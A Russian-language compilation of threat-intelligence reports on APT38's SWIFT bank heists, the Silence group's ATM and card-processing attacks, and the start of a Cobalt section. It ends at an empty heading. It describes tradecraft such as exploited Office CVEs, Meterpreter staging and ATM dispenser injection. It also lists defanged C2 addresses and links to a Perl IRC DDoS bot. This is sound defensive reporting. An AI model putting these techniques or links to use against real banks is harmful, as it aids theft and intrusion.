Если ты воображаешь, что в Северной Корее примерно три компьютера, на одном из которых Ким Чен Ын играет в League of Legends, а на другой кладет ноги, то ты ошибаешься. Северокорейские хакеры теперь фигурируют в новостях о крупных взломах наравне с русскими и китайскими, и их успехи впечатляют. Группа APT38 за четыре года похитила для своей страны сотни миллионов долларов прямо из банков. Вот как это происходит.

Недавно на сайте компании FireEye был опубликован доклад Un-usual Suspects («Необычные подозреваемые»), для подготовки которого исследователи скрупулезно изучили всю доступную информацию о северокорейских хакерах, проанализировали их методы и инструменты, а главное, мотивы атак. Именно на основании мотивов им удалось более четко выделить отдельные группировки, которые раньше СМИ валили в одну кучу под общим названием Lazarus Group.

INFO
FireEye базируется в Кремниевой долине и занимается кибербезопасностью. Компания помогает бороться с угрозами многим гигантам из списка Fortune 500: среди ее клиентов Yahoo, Microsoft, Pfizer, eBay, Adobe и даже американская разведка.


Мотивы и инструменты
Главный герой доклада — группа АРТ38, нацеленная прежде всего на финансовые преступления, в частности взлом банковских систем и кражу огромных сумм, в том числе из банкоматов. Специалисты предполагают, что с 2014 года хакеры из АРТ38 украли около 1,1 миллиарда долларов! Также эксперты FireEye выделили группу Lazarus, которая призвана сеять хаос и дестабилизировать работу крупных организаций, например с помощью WannaCry. Также «Лазарю» приписывают атаку на Sony Pictures в 2014 году. Третья группировка TEMP.Hermit специализируется на кибершпионаже и атаках на оборонные и государственные объекты.

Тем не менее эти три группировки, безусловно, связаны. В частности, совпадает 260 байт в рансомвари WannaCry, которой пользуется Lazarus, и бэкдоре Whiteout, которым пользуется АРТ38. Помимо этого, эксперты нашли общий захардкоженный массив данных у бэкдоров Macktruck и NestEgg, принадлежащих группировкам TEMP.Hermit и АРТ38 соответственно.
24133999_m.jpg


Специалисты FireEye на данный момент определили 26 уникальных семейств малвари, которые принадлежат перу АРТ38. Также группа использует два публично доступных семейства. Этот арсенал включает бэкдоры, вайперы, туннелеры и дата-майнеры. Если хочешь знать все подробности об их арсенале, смотри последние разделы доклада.

По мнению экспертов FireEye, группировка APT38 сосредоточила фокус именно на финансовых преступлениях, потому что ее главная задача — добывать деньги на содержание своей страны. Новые и новые санкции со стороны ООН серьезно потрепали экономику КНДР, а режим и армия сами себя не прокормят. И чем суровее санкции, тем активнее становятся «заработки».

INFO
В 2013 году, после очередного испытания северокорейской ядерной бомбы, Совет Безопасности ООН ввел новые санкции против КНДР. Теперь они касались не только военных разработок, но и денежных переводов, поступающих в Северную Корею из международной финансовой системы.
По хронологии атак АРТ38, воссозданной экспертами, видно, что хакеры охотятся исключительно на банки. Раньше эти атаки приписывали группам TEMP.Hermit и Lazarus, но в ходе расследования стало ясно, что у КНДР есть специализированная группировка для кражи денег.


2014 год — группа намечает цели будущих атак
Именно тщательная подготовка отличает группировку АРТ38 от многих коллег, да и в целом характерна для АРТ как класса атак. По информации FireEye, иногда хакеры находились в скомпрометированной системе цели месяцы и годы, анализируя уязвимости. В одном из случаев члены АРТ38 изучали работу компании изнутри на протяжении 155 дней, прежде чем совершить атаку. А рекордный срок — почти два года, 678 дней.

Да и не каждый раз дело заканчивалось кражей денег, первое время хакеры просто изучали, как работают финансовые системы. Например, в начале 2014 года они внедрили бэкдор NESTEGG и кейлоггер KEYLIME в один из банков в Юго-Восточной Азии, но до атаки на SWIFT дело так и не дошло.

Группа начала с прощупывания целей по соседству. Скорее всего, в своем регионе у АРТ38 было больше возможностей для отмывания украденных денег. Не прошло и пары лет, как группа расширила свою активность до глобальных масштабов.

Оценивая все усилия АРТ38, долгие разведывательные операции, исследование работы систем и даже отдельных пользователей, а также сопровождение денег после кражи, специалисты FireEye делают выводы о большом количестве персонала и сложной структуре группировки по всему миру.

Что такое APT
APT (Advanced Persistent Threat — развитая устойчивая угроза) — это класс целенаправленных атак как противоположность массовым атакам. АРТ обычно заранее тщательно спланированы, многоэтапны и включают элементы первоначальной разведки.

Без сомнений, северокорейская группировка относится именно к этому типу, поэтому ее обозначили как АРТ38. Кстати, предположительно российскую группировку Fancy Bear называют также АРТ28, ты наверняка слышал про их детище NotPetya и атаки на украинские электростанции.

Декабрь 2015 года — попытка взлома ханойского банка Tien Phong Bank
Хакеры из APT38 попытались вывести более миллиона евро через систему SWIFT и передать их в один из банков Словении, но кража не состоялась. Сотрудники TPBank вовремя заметили подозрительные действия и остановили движение средств. Представители вьетнамского банка предполагают, что малварь работала у одного из их внешних подрядчиков, отношения с которым они немедленно разорвали.

Это был первый раз, когда хакеры использовали свою малварь (DYEPACK) для сокрытия следов. Этот инструмент позволяет менять локальные данные о совершенных в системе SWIFT транзакциях, чтобы мошенничество трудно было вовремя обнаружить.

SWIFT
SWIFT (Society for Worldwide Interbank Financial Telecommunication — Общество всемирных межбанковских финансовых каналов связи) — международная межбанковская система передачи информации и совершения платежей. Эта технология используется еще с 1970-х годов. Головной офис SWIFT находится в Брюсселе, а владеют этим кооперативным обществом более 9 тысяч банков по всему миру.

SWIFT — излюбленная цель хакеров из АРТ38 и основа банковской деятельности по всему миру. К этой системе подключены порядка 11 тысяч банков и финансовых организаций, у каждого из которых есть уникальный SWIFT-код. Система SWIFT, по сути, передает от банка к банку сообщения, платежные поручения, которые проверяются и обрабатываются, и каждой транзакции присваивается собственный номер.

Хакеры из APT38 создали малварь, которая позволяла не только выпускать неавторизованные сообщения, но и скрывать факт их отправки. Причем им удавалось не только стирать записи об отправке средств, но и блокировать сообщения, подтверждающие транзакцию. Беднягам пришлось проштудировать все мануалы по работе с системой SWIFT, чтобы создать малварь, бьющую точно в цель.

Февраль 2016 года — атака на Центральный банк Бангладеш
Хакеры пытались украсть из ЦБ Бангладеш около миллиарда долларов, находившихся в Федеральном резервном банке Нью-Йорка. Они отправили 35 запросов на перевод, но только пять из них были обработаны. В результате первых четырех транзакций 81 миллион долларов ушел в филиппинский банк на четыре частных счета, и большую часть этих денег злоумышленники сразу же перевели дальше.

По пятому запросу 20 миллионов долларов направлялись в шри-ланкийскую частную компанию Shalika Foundation. Но, испугавшись невиданной суммы, представители местного банка вернули транзакцию на проверку назад по пути роутинга. Проверяя платежное поручение, сотрудник немецкого Deutche Bank заметил, что хакеры опечатались, написав Fandation вместо Foundation, и заблокировал подозрительную транзакцию.

Мошеннические транзакции можно было заметить еще на стороне бангладешского банка, вот только АРТ38 позаботились об этом заранее. В этом банке все транзакции SWIFT проверялись по бумажным распечаткам в конце дня, и, чтобы скрыть следы, малварь вмешалась в работу принтера. Затем злоумышленникам помог выходной день — в Бангладеш это пятница, — и, вернувшись к работе, сотрудники банка обнаружили множество сообщений от ФРБ Нью-Йорка.

Американские клерки обратили внимание на подозрительные платежные поручения, но, не дождавшись ответа от ЦБ Бангладеш, ушли на выходные. Таким образом, у преступников было достаточно времени, чтобы запутать следы и вывести украденные деньги.

«Атакующие определенно обладали глубокими и детальными познаниями о специфике контроля над операциями в пострадавших банках. Эти сведения они могли получить как от инсайдера, так и в результате кибератаки, также возможно и сочетание обоих вариантов», — гласило официальное заявление SWIFT.

Кстати, глава банка подал в отставку после этого происшествия.

Почти сразу представители SWIFT сообщили о второй атаке — на неназванный коммерческий банк во Вьетнаме. Там повторилась похожая схема, только вместо распечаток для проверки проведенных транзакций использовались отчеты в формате PDF. В этом случае хакеры из АРТ38 изменили программу — просмотрщик PDF так, чтобы мошеннические переводы не отразились в списке. Эти факты еще раз демонстрируют, как детально хакеры были знакомы с процедурами и внутренней кухней каждого банка.
24133998_m.jpg


INFO
Очередные санкции ООН в ответ на ядерные испытания в 2016 году еще больше ограничивают экономические возможности КНДР. В основном это жесточайшие ограничения экспорта из Северной Кореи по всем крупнейшим статьям.


Отравленный водопой
Похоже, с каждым новым витком санкций экономическое давление вынуждает хакеров действовать все более спешно. В октябре 2016 года АРТ38 начинает использовать новый инструмент — атаки типа watering hole (водопой). Такие атаки названы по аналогии с тактикой хищников, которые охотятся у водопоя, поджидая добычу — животных, пришедших напиться.

Хакеры же внедряют вредоносное ПО на сайты, чаще всего нишевые, которыми постоянно пользуются намеченные жертвы. АРТ38 использовали в качестве «водопоев» медиапорталы, специализирующиеся на криптовалютах, — это как раз было на пике криптовалютного хайпа в 2016 году. Эти сайты действительно много посещали представители финансовых компаний и банков, искавшие информацию о разных койнах и ICO. Еще ловушки расставляли на новостных сайтах по теме бизнеса и финансов, а также на биржах.

Пара слов о санкциях
В 2017 году ООН ограничивает экспорт основных товаров из КНДР еще сильнее, а также запрещает создание совместных предприятий с участием северокорейского капитала. Между тем система SWIFT полностью блокирует доступ к системе всем северокорейским банкам. Китайские корпорации перестают импортировать в КНДР нефтепродукты, а китайские банки приостанавливают работу с северокорейскими гражданами и фирмами. КНДР продолжает испытания оружия.

Октябрь 2017 года — атака на Дальневосточный международный банк (FEIB) на Тайване
Для изначального проникновения хакеры использовали таргетированный фишинг, рассылая письма со ссылками на скачивание якобы документов Office и PDF. На самом деле ссылки вели на бэкдоры. Проникнув в сеть банка через SMB, они внедрили свою кастомную малварь и уже через пару дней получили учетные данные от двух аккаунтов SWIFT.

Через систему SWIFT хакеры отправили несколько платежных поручений на общую сумму 60 миллионов долларов в банки США, Камбоджи и Шри-Ланки. Большая часть транзакций не прошла из-за неточности в заполнении поручения на обеспечение платежей, так что тайваньский банк понес лишь незначительные убытки.

Шриланкийским подельникам удалось снять часть денег, переведенных из FEIB, — 195 тысяч долларов, но, когда они вернулись в Bank of Ceylon за остальными деньгами, их уже ждали с наручниками. Для небольшого государства перевод в 1,2 миллиона выглядел слишком подозрительно.
24133997_m.jpg


Как только атака была обнаружена, хакеры запустили во внутреннюю сеть банка модифицированную версию шифровальщика Hermes, которая не требовала выкуп, а отображала сообщение «Finish work» и оставляла во всех директориях файл с именем UNIQUE_ID_DO_NOT_REMOVE. Таким образом они зашифровали возможные улики и затруднили расследование.

Январь 2018 года — попытка ограбления Bancomext в Мексике
Однажды утром работа банка Bancomext пошла как-то не так: некоторые сотрудники не смогли включить свои компьютеры, интернет работал медленнее обычного, машины тормозили — а еще в этот день объем транзакций был в пару раз больше обычного. Просто хакеры из АРТ38 пытались украсть у Bancomext более 110 миллионов долларов.

Забавно, что перевод они оформили в виде пожертвования от мексиканского банка в пользу корейской церкви. Сотрудники банка вовремя заметили подозрительные транзакции и заблокировали платеж. Им повезло, что в Корее было три часа ночи и тамошний банк не мог обработать входящий перевод, так что деньги не успели утечь дальше.

Все же Bancomext пришлось временно приостановить работу до выяснения обстоятельств: операции были заморожены, работники разошлись по домам, были выключены телефон и почтовый сервер, так что без потерь не обошлось. Но убытки от простоя не идут в сравнение с несостоявшейся кражей.

Как потом выяснилось, система банка была скомпрометирована за много месяцев до попытки перевода денег — хакеры из АРТ38, как обычно, собирали информацию о работе банка, чтобы получше скрыть готовящееся преступление.
24133996_m.jpg


Май 2018 года — попытка ограбления Banco De Chile
Пресс-служба банка сначала отрицала кибератаку, но затем признала, что банк атакован неким «вирусом». Тем временем сотрудники банка публиковали в соцсетях фотографии своих компьютеров, по которым понятно, что малварь стерла master boot record и система перестала загружаться.
24133995_m.jpg


Кроме того, на одном чилийском форуме опубликовали скриншот частной переписки с сотрудником банка. Из переписки было понятно, что атака вывела из строя более 9 тысяч компьютеров и 500 серверов. Хакеры использовали вайпер, известный как KillMBR или KillDisk, чтобы не оставить никаких улик киберкриминалистам.

Служба безопасности банка попалась на отвлекающий маневр и пыталась восстановить работоспособность компьютеров, а хакеры занялись кражей денег через систему SWIFT. По словам генерального директора, в результате мошеннических транзакций банк потерял 10 миллионов долларов — деньги были отправлены в один из банков Гонконга.

Август 2018 года — взлом индийского Cosmos bank
Недавняя атака проводилась в два этапа. 11 августа с 15:00 до 22:00 подставные «мулы» в 28 странах мира массово выгружали деньги из банкоматов — за эти семь часов было выполнено более 15 тысяч транзакций. Мошенники использовали клонированные карты.

Все внимание отдела безопасности банка было направлено на банкоматы, но через день, в понедельник, 13 августа, группа АРТ38 вступила в игру со своей обычной схемой переводов через SWIFT. Преступники перевели почти 2 миллиона долларов на счет в одном из гонконгских банков. Расследование все еще идет, так что информация об атаке засекречена. Руководство индийского банка надеется отследить и вернуть хотя бы часть украденных денег.

Холодная война
Многочисленные атаки АРТ38 на SWIFT, конечно, повлекли за собой усиление безопасности системы переводов. В частности, в 2016 году представители SWIFT объявили о запуске новой программы безопасности клиентов. Но и северокорейские хакеры непрерывно совершенствуют свои инструменты. Вряд ли эта гонка вооружений остановится в ближайшее время, особенно если учесть, что ООН все туже закручивает гайки для КНДР.

В сентябре Министерство юстиции США предъявило обвинения гражданину Северной Кореи по имени Пак Чин Хёк. Обвиняют его в участии во всех атаках, которые приписывают северокорейским группировкам, включая взлом Sony Pictures в 2014 году, кражу из Центробанка Бангладеш и распространение шифровальщика WannaCry.

Свои заявления представители Минюста подкрепили детальным отчетом на 179 страницах. В докладе приводится множество доказательств: email, IP-адреса, а также повторно используемые отрывки кода и схемы шифрования. Подозреваемому грозит около 25 лет тюрьмы, если тот когда-нибудь окажется в руках американской системы правосудия.
 
SILENCE

SILENCE — АКТИВНАЯ МАЛОИЗУЧЕННАЯ ХАКЕРСКАЯ ГРУППА, КОТОРАЯ ОЧЕНЬ БЫСТРО УЧИТСЯ, В ТОМ ЧИСЛЕ, НА СОБСТВЕННЫХ ОШИБКАХ И ОПЫТЕ ДРУГИХ ГРУПП

В августе 2017 года Нацбанк Украины предупредил государственные и частные банки о масштабной фишинговой рассылке. Ее авторы использовали эксплоит из арсенала прогосударственной хакерской группы APT28. Однако сам инструмент, как выяснили в Group-IB, был модифицирован специально под атаку на банки — судя по всему, авторы рассылки обладали глубокими навыками реверс-инжиниринга.
Украинский ЦБ тогда связал эту атаку с новой волной эпидемии вируса шифровальщика NotPetya, но это были не прогосударственные хакеры. Можно было предположить, что эта целевая атака — дело рук наиболее агрессивных хакерских групп уровня Cobalt или MoneyTaker. Но и эта гипотеза не подтверждалась. Те, с кем столкнулись специалисты Group-IB, оказались малоизученной, молодой и активной хакерской группировкой, которая очень быстро училась, в том числе и на собственных ошибках.
Новое явление хакерской сцены получило название Silence. Это имя уже звучало в сообщениях антивирусных вендоров, однако никаких технических подробностей о группе до появления данного отчета не было.
Хакерские группы, специализирующиеся на целенаправленных атаках на банки, — Anunak, Corkow, Buhtrap — имели отношение к управлению ботсетями. Silence — исключение из правил. Еще в начале своего пути, летом 2016 года, Silence не имела навыков взлома банковских систем и в процессе своих первых операций училась прямо по ходу атаки. Они внимательно анализировали опыт, тактику, а также инструменты других преступных групп.
Они постоянно пробовали применять на практике новые техники и способы краж из различных банковских систем, в числе которых АРМ КБР, банкоматы, карточный процессинг.
Навыки в области реверс-инжиниринга и пентеста, уникальные инструменты, которые хакеры создали для взлома банковских систем, выбор неизвестного трояна для патчинга, а также многочисленные ошибочные действия подтверждают гипотезу о том, что бэкграунд Silence, скорее всего, легитимный. Как минимум один из хакеров работал (или продолжает работать) в компании, специализирующейся на информационной безопасности. Чем дольше мы изучали группу, тем более устойчивой становилась версия о том, что мы имеем дело с одним или несколькими whitehat, которые перешли на темную сторону.

После того, как Group-IB вышла на след Silence, ее участники перешли в контратаку. Одно из фишинговых писем было сознательно направлено на адрес CERT-GIB (Центр реагирования на инциденты информационной безопасности Group-IB). Вряд ли это была атака в чистом виде, скорее «вызов». И мы его приняли.

Данный отчет является первым подробным исследованием, раскрывающим преступления группы Silence.

Silence — новая угроза для банков
Первые следы хакерской группы, получившей название Silence, эксперты Group-IB обнаружили в июне 2016 года. Тогда киберпреступники только начинали пробовать свои силы. Одной из первых целей Silence стал банк в России, который они попытались атаковать через АРМ КБР. После чего хакеры надолго «замолчали». Позже выяснилось, что это стандартная практика для Silence. Они атакуют избирательно, между инцидентами проходит около трех месяцев, что втрое больше, чем у других групп, специализирующихся на целевых атаках, например, у MoneyTaker, Anunak (Carbanak), Buhtrap или Cobalt.
Причина — в крайне малочисленном составе Silence. Впервые за всю практику киберразведки и расследований киберпреступлений Group-IB мы встречаемся с такой структурой и ролевым распределением в группе. Silence постоянно анализируют опыт других преступных групп, пробуют применять новые техники и способы краж из различных банковских систем, включая АРМ КБР, банкоматы, карточный процессинг. Менее чем за год объем хищений Silence вырос в пять раз.

Группа
Рабочая версия экспертов Group-IB предполагает, что в команде Silence четко прослеживаются две роли — оператора и разработчика. Вероятно, оператор является лидером группы, по характеру действий он — пентестер, хорошо знакомый с инструментарием для проведения тестов на проникновение в банковскую инфраструктуру. Эти знания позволяют группе легко ориентироваться внутри атакуемого банка. Именно оператор получает доступ к защищенным системам внутри банка и запускает процесс хищений.
Разработчик параллельно является реверс-инженером с достаточно высокой квалификацией. Его академические знания о том, как создаются программы, не мешают ему делать ошибки в коде. Он отвечает за разработку инструментов для проведения атак, а также способен модифицировать сложные эксплойты и чужие программы. При этом для патчинга он использует малоизвестный троян, ранее не встречавшийся ни у одной другой группы. Кроме
того, он знает технологии работы банкоматов и имеет доступ к сэмплам вредоносного ПО, которые, как правило, содержатся в базах компаний, занимающихся информационной безопасностью.
24206796_m.png


Язык
Как и большинство финансово-мотивированных APT-групп, участники Silence русскоговорящие, о чем свидетельствуют язык команд программ, приоритеты по расположению арендуемой инфраструктуры, выбор русскоязычных хостеров и локация целей преступников:
• Команды трояна Silence — русские слова, набранные на английской раскладке:
htrjyytrn > reconnect > реконнект
htcnfhn > restart > рестарт
ytnpflfybq > notasks > нетзадач
• Основные цели находятся в России, хотя фишинговые письма отправлялись также сотрудникам банков в более чем 25 странах в Центральной и Западной Европы, Африки и Азии.
• Для аренды серверов Silence пользуются услугами русскоговорящих хостеров.

ХИЩЕНИЯ
Хронология атак
2016 год, июль — неудачная попытка вывода денег через российскую систему межбанковских переводов АРМ КБР. Злоумышленники получили доступ к системе, но атака сорвалась из-за неправильной подготовки платежного поручения. В банке остановили подозрительную транзакцию и провели реагирование собственными силами, постаравшись устранить последствия атаки. Это привело к новому инциденту.
2016 год, август — новая попытка взлома того же банка. Спустя всего месяц (!), после провала с АРМ КБР, хакеры восстанавливают доступ к серверам этого банка и предпринимают повторную попытку атаковать. Для этого они загрузили программу для скрытого создания скриншотов экрана пользователя и начали изучать работу операторов по псевдо-видеопотоку. На этот раз банк принял решение о привлечении экспертов Group-IB для реагирования на инцидент. Атака была предотвращена. Однако восстановить полную хронологию инцидента не удалось, т.к. при попытке самостоятельно очистить сеть, ИТ-служба банка удалила большую часть следов активности злоумышленников.
2017 год, октябрь — первый известный нам успешный случай вывода денег этой группой. На этот раз Silence атаковали банкоматы. За одну ночь им удалось похитить 7 млн. рублей. В этом же году они проводили DDoS-атаки с помощью Perl IRC бота, используя публичные IRC чаты для управления троянами.
После неудачной атаки через систему межбанковских переводов в 2016 году преступники больше не пытались вывести деньги через нее, даже имея доступ к серверам АРМ КБР.
2018 год, февраль — успешная атака через карточный процессинг: за выходные им удалось снять с карточек через банкоматы партнера банка 35 млн. рублей.
2018 год, апрель — уже через два месяца группа возвращается к прежней схеме и выводит деньги через банкоматы. Им удается за одну ночь «вынести» порядка 10 млн. рублей. На этот раз созданные Silence программы были усовершенствованы: избавлены от лишних функций и прежних ошибок.

География
Успешные атаки Silence ограничиваются странами СНГ и Восточной Европой, а основные цели находятся в России, Украине, Белоруссии, Азербайджане, Польше, Казахстане.
Однако единичные фишинговые письма отправлялись также сотрудникам банков в более чем 25 странах Центральной и Западной Европы, Африки и Азии: Киргизия, Армения, Грузия, Сербия, Германия, Латвия, Чехия, Румыния, Кения, Израиль, Кипр, Греция, Турция, Тайвань, Малайзия, Швейцария, Вьетнам, Австрия, Узбекистан, Великобритания, Гонконг и другие.

ИНСТРУМЕНТЫ И ИНФРАСТРУКТУРА
Первые шаги
По данным Лаборатории криминалистики Group-IB, во время первых операций хакеры Silence использовали чужие инструменты и учились буквальнопо ходу атаки. Однако со временем они перешли от использования чужих инструментов к разработке собственных и значительно усовершенствовали тактику.
В первых операциях киберпреступники патчили чужой малораспространенный бэкдор Kikothac. Они выбрали троян, известный с ноября 2015 года, реверс и реализация серверной части которого не требовали много времени.
Использование чужого бэкдора позволяет предположить, что группа начала работу без предварительной подготовки, и первые операции были лишь попыткой проверить свои силы.

Инструменты
Позже преступники разработали уникальный набор инструментов для атак на карточный процессинг и банкоматы, который включает в себя самописные программы:
• Silence — фреймворк для атаки на инфраструктуру.
• Atmosphere — набор программ для «потрошения» банкоматов.
• Farse — утилита для получения паролей с зараженного компьютера.
• Cleaner — инструмент для удаления логов удаленного подключения.
Заимствованные инструменты:
• Smoke bot — бот для проведения первой стадии заражения.
• Модифицированный Perl IRC DDoS bot, основанный на Undernet DDoS bot, для осуществления DdoS-атак.

Фишинговые рассылки
Вначале для рассылок писем группа использовала взломанные серверы и скомпрометированные учетные записи, однако позже преступники начали регистрировать фишинговые домены и создавать для них самоподписанные сертификаты.
Для того, чтобы обойти системы фильтрации писем, они используют DKIM и SPF. Письма отправляются от имени банков, у которых не был настроен SPF, с арендованных серверов с подмененными заголовками. Злоумышленники составляли полные грамотные тексты для писем и отправляли их от имени сотрудников банка, чтобы повысить шанс успешности атаки.
Во вложении письма содержались эксплоиты под MS Office Word с decoy документами CVE-2017-0199, CVE-2017-11882+CVE-2018-0802, CVE-2017-0262, а также CVE-2018-8174. Помимо эксплоитов рассылались письма со вложенными CHM-файлами, что встречается достаточно редко, а также с ярлыками .LNK, запускающими Powershell-скрипты и JS-скрипты.

Управление атакой и закрепление в системе
Оператор проводит атаки с Linux-машины с использованием утилиты WinExe (Linux аналог PSExec), которая может запускать программы на удаленном узле через SMB-протокол. После закрепления в системе троян Silence устанавливает stager Meterpreter на зараженную систему. Для доступа к скомпрометированным компьютерам киберпреступники используют Radmin — программу, которую в некоторых банках устанавливают сами администраторы для удаленного управления рабочими станциями.

Серверная инфраструктура

Арендованные злоумышленниками серверы для осуществления фишинговых атак находятся в России и Нидерландах. Под командные центры они используют услуги хостинга с Украины, который позволяет размещение практически любого контента, в том числе запрещенной информации, вредоносных приложений и файлов. Также несколько серверов Silence арендовали в MaxiDed, инфраструктура которого была заблокирована Европолом в мае 2018 года.

Silence: развитие инструментов и типы атак
24206797_m.png


ИНСТРУМЕНТАРИЙ
Важной особенностью группы Silence является использование уникальных инструментов, разработанных ими для проведения атак. К таким инструментам относится одноименный фреймворк Silence, уникальный набор для атаки на банкоматы — Atmosphere pack, утилита для получения паролей с зараженного компьютера — Farse, а также инструмент для удаления логов удаленного подключения Cleaner.

Silence
Уникальный фреймворк Silence, используемый группой, является модульным и состоит из следующих компонентов (обнаруженных нами, их список может быть шире):
• загрузчик Silence.Downloader
• основной модуль Silence и пропатченный бэкдор Kikothac
• модуль слежки за пользователем Silence.SurveillanceModule
• proxy Silence.ProxyBot
При этом основной модуль может прогрузить любой другой исполняемый файл, что не ограничивает функциональность системы и расширяет ее возможности.
В ранних атаках вместо Silence применялся пропатченный бэкдор Kikothac.
24206798_m.png

После открытия вложенного аттача в виде эксплоита под MS Office происходит загрузка и установка загрузчика для трояна Silence.Downloader. Загрузчик прописывается в автозагрузку и ожидает команду на загрузку и запуск следующей стадии. В случае если сервер не представляет интереса для атакующего, то бот получает команду на самоудаление.
24206799_m.png

Основное тело трояна Silence после запуска также прописывает себя в автозагрузку, после чего регистрируется на сервере, а затем переходит в цикл получения и исполнения команд. Основная задача трояна — выполнение удаленных команд в командном интерпретаторе, а также загрузка и запуск произвольного ПО.
24206800_m.png

24206801_m.png

Для доступа в изолированные сегменты корпоративной сети Silence догружает модуль ProxyBot. Задача этой программы — перенаправить через зараженный компьютер трафик от внешнего сервера злоумышленника до локальных узлов скомпрометированной сети, доступ к которым извне закрыт. Данная программа была обнаружена в двух видах: первая была написана на Delphi, вторая — на C#.
24206802_m.png

Для изучения работы оператора скомпрометированного компьютера злоумышленники устанавливали SurveillanceModule, который скрытно создавал снимки рабочего стола, из которых затем можно было склеить псевдо-видеопоток.
На последнем этапе атаки бот устанавливает stager Meterpreter в систему, что позволяет автоматизировать работу по перемещению в сети.
Проанализировав управляющие серверы, мы также обнаружили бэкдор Kikothac, взаимодействующий с одним из серверов Silence 46.183.221[.]89 Сначала мы решили, что данная программа не связана с деятельностью Silence, однако время залива на публичную песочницу HybridAnalysis совпадало по времени с атакой Silence. Также сэмпл Kikothac был залит с тем же именем, под которым был загружен троян Silence на VirusTotal.
При подробном анализе обнаружилось, что ссылка на оригинальный адрес управляющего сервера отсутствует, а код, отвечающий за установку соединения с сервером использует ссылку на адрес, который был записан поверх статически слинкованного кода, генерируемого компилятором.
Помимо этого все команды Kikothac начинаются с символа #, в том числе команда на загрузку файла из сети #wget. Точно такая же команда реализована в трояне Silence, причем это единственная команда, начинающаяся с символа #. Любая другая строка, не входящая в список команд Kikothac, автоматически отправляется на исполнение в командный интерпретатор cmd.exe. То же самое делает и Silence.

Atmosphere
Для управления диспенсером банкоматов Silence используют уникальную программу Atmosphere. На протяжении всей видимой нам деятельности группы троян модифицировался, чтобы соответствовать требованиям Silence. Так троян изменил логику внедрения в процессы, его автор добавил ему гибкий инжектор, что позволило расширить перечень поддерживаемых банкоматов,с которыми работала группа. В дальнейшем троян был избавлен от ненужных функций, которые мешали или не использовались при работе преступников. Например, в последней версии программа не обрабатывала команды с пинпада, а генерируемый лог стал меньше. На начальном этапе развития программу перекомпилировали множество раз, что, скорее всего, привело к нескольким безуспешным попыткам извлечь наличность.
24206803_m.png

Хакеры удаленно устанавливают на банкомат Atmosphere.Dropper, в ресурсах которого содержится библиотека .DLL — основное тело трояна Atmosphere. После извлечения тела дроппер внедряет библиотеку в процесс с именем fwmain32.exe. Уже внутри управляющего процесса библиотека предоставляет возможность удаленного управления диспенсером. Как было отмечено выше, в первых версиях присутствовала возможность управления диспенсером с помощью пинпада, но позже эти функциональные возможности были удалены.
Команды передаются программе через файлы с определенным расширением. Программа считывает команды, исполняет, а затем по логике автора, должна переписывать файл мусором и удалять его для затруднения работы форензик-экспертов. Однако логика программы содержит ошибку, вследствие чего мусор не пишется поверх файла, а дописывается в конец. Данная ошибка встречается и в других программах, используемых группой Silence, что говорит о единственном авторе. Например, этот же участок кода использовался в программе для очистки журналов подключения Radmin. В ходе мероприятий по реагированию на инцидент информационной безопасности в одном из банков команда криминалистов Group-IB обнаружила порядка 11 программ Atmosphere, скомпилированных в разное время и с незначительными изменениями. В одной директории с программами были найдены сценарии для командного интерпретатора, а также отдельный Injector, который принимал на вход в виде аргументов путь до библиотеки DLL и идентификатор процесса, куда должен был внедрить указанную библиотеку. Однако сценарии передавали не идентификатор процесса, а имя целевого процесса, что в итоге привело к безуспешной попытке получить контроль над
диспенсером.

Undernet DDoS bot
При анализе одного из серверов Silence был обнаружен DDoS бот Perl IrcBot. 20 апреля 2017 года с адреса driley123@bellsouth[.]net были разосланы фишинговые письма с эксплоитом, который загружал на машину Silence.Downloader c адресом управляющего сервера 92.222.68[.]32. По адресам hxxp://92.222.68[.]32/bot.pl и hxxp://92.222.68[.]32/wolf/ вплоть до 18 июня 2018 года был доступен Perl IrcBot для проведения DdoS-атак.
Первое упоминание этой программы было обнаружено на испанском форуме в сообщениях 2014 года hxxps://forum.voidsec[.]com/thread-93.html. В сети были обнаружены модификации этого бота: hxxps://github[.]com/H1R0GH057/Anonymous/blob/master/ircabuse.pl и hxxps://gist.github[.]com/dreadpiratesr/7bccc6eed49150a8564a.
Версия, используемая Silence, основана на Undernet DDoS bot (доступен по второй ссылке), согласно уникальной строчке «PRIVMSG : 4,1 [Help] 9,1 Undernet PerlBot Main Help:».
Программы управляются через IRC сообщения. Использовались два сервера:
1. ira.pubcs16[.]ro — публичный сервер игроков в counter-strike через канал #test; позже использовался канал #PMA
2. piratesofcyber[.]tk

Smoke bot
В одной из англоговорящих рассылок 2017 года был JS-загрузчик, который устанавливал Smoke Bot в систему. Smoke Bot начал продаваться на андеграундных форумах в 2011 году, его продавцом является русскоговорящий злоумышленник под псевдонимом SmokeLdr.
Помимо функций загрузки и исполнения произвольных файлов, Smoke bot имеет в наличии:
• функции сбора парольной информации из браузеров, почтовых программ и другого ПО;
• функции сбора почтовых адресов из сохраненных почтовых аккаунтов;
• функции перехвата вводимых в браузеры данных;
• функции перехвата почтовых и FTP-паролей (в режиме реального времени);
• возможности сбора файлов по заданным критериям;
• модуль DDoS;
• модуль TeamViewer;
• модуль майнинга криптовалюты.
 
COBALT

COBALT

26 марта 2018 года Европол сообщил об аресте в испанском городе Аликанте лидера Cobalt — хакерской группировки, которую Банк России называл главной угрозой для банков. Размах их деятельности поражает: Cobalt, по оценкам Европола, похитила около 1 млрд евро у 100 банков в 40 странах мира: России, Великобритании, Нидерландах, Испании, Румынии, Белоруссии, Польши, Эстонии, Болгарии, Грузии, Молдавии, Киргизии, Армении, Тайване, Малайзии и так далее.

Вначале хакеры специализировались на бесконтактных (логических) атаках на банкоматы. Кроме систем управления банкоматами, киберпреступники старались получить доступ к платежным шлюзам и карточному процессингу. В конце 2017 года впервые в истории финансовой системы России они совершили успешную атаку на банк с использованием системы межбанковских переводов (SWIFT).

Долгое время “секрет успеха” Cobalt состоял в том, что хакеры тестировали новые инструменты и схемы, часто меняли локацию проведения атак и хорошо знали, как работают банки. После заражения компьютеров сотрудников банка группа Cobalt изучала внутреннюю инфраструктуру организации, наблюдала за рабочим процессом и только после этого проводила атаку. В среднем промежуток от проникновения до вывода денег составлял три-четыре недели, средняя сумма хищения — 100 млн руб.

Задержание лидера группы в Испании случилось значительно раньше, чем об этом официально объявили. Однако, даже после ареста мы фиксировали активные фишинговые рассылки группы Cobalt. В день официального анонсирования ареста Центр реагирования на киберинциденты (CERT) Group-IB зафиксировал вредоносную рассылку Cobalt от имени компании Spamhaus, некоммерческой организации, которая борется со спамом и фишингом.

Слияние и поглощение

